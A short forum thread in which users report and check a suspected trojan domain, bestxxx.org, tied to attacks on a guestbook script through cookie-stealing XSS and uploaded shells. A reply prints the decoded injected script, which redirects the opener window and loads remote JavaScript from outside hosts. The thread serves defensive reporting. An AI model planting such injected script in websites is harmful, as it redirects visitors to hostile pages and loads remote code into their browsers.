Trojan - bestxxx.org

[gimcnuk]

Please, add in Your base following domain: bestxxx.org

Code: [Select]

http://bestxxx.org/images/s.js Trojan
Hacking is going through hole in script GB Top-Directory (http://gbscript.com/)
1. XSS-injection with stealing cookies from admin section through this script: bestxxx.org/images/img.php?
2. Uploading shells on server and inserting JS-code from this page: bestxxx.org/images/s.js

Details (in russian) here: http://mastertalk.ru/topic127171.html - there also decoded version of trojan
Russian support of hosting only deletes scripts but lately its was restored in the same places.

Thanks.

[SysAdMini]

I'm sorry, but I can't reproduce what you reported.

hxxp://bestxxx.org/images/img.php? just returns a gif image.

bestxxx.org/images/s.js decodes to

Code: [Select]

<script type='text/javascript'>if (parent.window.opener) parent.window.opener.location='http://xtds.in';</script>
<script language="javascript" src="http://www.clayaim.com/index.php?ref=webex"></script>
Neither hxxp://xtds.in nor hxxp://www.clayaim.com/index.php?ref=webex leads me to any malware.

[gimcnuk]

This code was inserted into many sites. By abuse it was deleted but lately restored in the same place, that means this code added by owner site.